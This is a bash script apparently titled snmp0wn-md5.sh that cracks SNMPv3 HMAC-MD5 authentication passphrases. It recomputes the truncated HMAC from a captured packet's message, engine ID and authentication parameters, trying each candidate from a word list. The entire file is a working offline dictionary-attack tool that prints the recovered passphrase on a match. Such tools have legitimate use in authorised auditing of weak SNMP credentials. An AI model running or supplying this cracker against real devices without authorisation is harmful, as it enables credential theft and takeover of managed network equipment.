snmp0wn-md5.sh
#!/bin/bash
# --- Capture-specific inputs ---------------------------------------------
# Fill these three in from your packet capture before running the script.
msgWhole=''
msgAuthenticationParameters=''
msgAuthoritativeEngineID=''

# --- Fixed values ---------------------------------------------------------
# Word list file, read one candidate passphrase per line.
dictionary='dico.txt'
# HMAC outer pad: the byte 0x5c repeated, written as a hex string.
opad='5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c5c'
# HMAC inner pad: the byte 0x36 repeated, written as a hex string.
ipad='36363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636363636'
# Function
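#######################################
# Recompute the truncated HMAC-MD5 authentication value of the captured
# SNMPv3 message for one candidate passphrase and compare it with the
# value taken from the capture.
# Everything needed comes from one captured message, so the passphrase's
# resistance to dictionary guessing is the only thing this check measures.
# Globals:
#   password, msgAuthoritativeEngineID, msgAuthenticationParameters,
#   msgWhole, ipad, opad (read)
#   AuthKey, ExtAuthKey, K1, K2, Hash_K1_msgWhole, Hash_K2_HashK1msgWhole,
#   TestmsgAuthenticationParameters (written)
# Outputs:
#   One progress line per candidate; the passphrase on a match.
#   Diagnostics go to stderr.
# Returns:
#   1 when snmpkey or bc produced no output; 0 when the candidate did not
#   match. On a match the whole script exits with status 0.
#######################################
function CompareHashes() {
  local pad_width

  printf 'Testing password: %s\n' "$password"

  # Derive the localized authentication key for this engine ID. The line
  # kept is "authKey: 0x<hex>"; the cut calls strip the label and "0x".
  # Quoting keeps candidates with blanks or glob characters as one argument.
  AuthKey=$(snmpkey md5 "$password" "$msgAuthoritativeEngineID" | grep authKey | cut -d ' ' -f 2 | cut -c 3-)
  if [[ -z "$AuthKey" ]]; then
    printf 'CompareHashes: snmpkey returned no authKey, candidate skipped\n' >&2
    return 1
  fi

  # Zero-extend the key so it can be XORed with the pads
  # (presumably up to the MD5 block length - confirm against ipad/opad).
  ExtAuthKey="${AuthKey}000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

  # xor() is expected to come from logic.bc; bc wants upper-case hex digits.
  K1=$(printf '%s\n' "obase=16;ibase=16; xor(${ExtAuthKey^^},${ipad^^})" | BC_LINE_LENGTH=0 bc -l logic.bc)
  K2=$(printf '%s\n' "obase=16;ibase=16; xor(${ExtAuthKey^^},${opad^^})" | BC_LINE_LENGTH=0 bc -l logic.bc)
  if [[ -z "$K1" || -z "$K2" ]]; then
    printf 'CompareHashes: bc returned no XOR result (is logic.bc present?)\n' >&2
    return 1
  fi

  # bc prints numbers without leading zeros. A dropped nibble would shift
  # every byte pair below and yield a wrong digest (a false "no match"),
  # so restore the full pad width before converting hex to bytes.
  pad_width=${#ipad}
  while (( ${#K1} < pad_width )); do K1="0${K1}"; done
  while (( ${#K2} < pad_width )); do K2="0${K2}"; done

  # Inner digest: MD5(K1 || msgWhole); outer digest: MD5(K2 || inner).
  # sed turns each hex pair into \xHH and printf %b emits the raw bytes.
  Hash_K1_msgWhole=$(printf '%b' "$(printf '%s' "${K1,,}${msgWhole}" | sed 's/../\\x&/g')" | md5sum | awk '{print $1}')
  Hash_K2_HashK1msgWhole=$(printf '%b' "$(printf '%s' "${K2,,}${Hash_K1_msgWhole}" | sed 's/../\\x&/g')" | md5sum | awk '{print $1}')

  # Only the first 24 hex digits (12 bytes) of the digest are compared.
  TestmsgAuthenticationParameters=${Hash_K2_HashK1msgWhole:0:24}

  # Uncomment below for debugging
  #echo -e "DEBUG\n"
  #echo "AuthKey=${AuthKey}"
  #echo "ExtAuthKey=${ExtAuthKey}"
  #echo "K1=${K1}"
  #echo "K2=${K2}"
  #echo "Hash_K1_msgWhole=${Hash_K1_msgWhole}"
  #echo "Hash_K2_HashK1msgWhole=${Hash_K2_HashK1msgWhole}"
  #echo "TestmsgAuthenticationParameters=${TestmsgAuthenticationParameters}"

  # [[ ]] with quoted operands is a literal string comparison and does not
  # error out when the captured value has been left empty.
  if [[ "$TestmsgAuthenticationParameters" == "$msgAuthenticationParameters" ]]; then
    # Hash matches, report the passphrase and stop the script
    echo "Winner Winner, Chicken Dinner! "
    printf 'The password is: %s\n' "$password"
    exit 0
  fi
}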
# Loop through the dictionary
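# Hand every dictionary line to CompareHashes as the candidate in $password.
# IFS= and -r keep surrounding blanks and backslashes exactly as written in
# the word list; the extra -n test also processes a final line that has no
# trailing newline.
while IFS= read -r password || [[ -n "$password" ]]; do
  CompareHashes
done < "./${dictionary}"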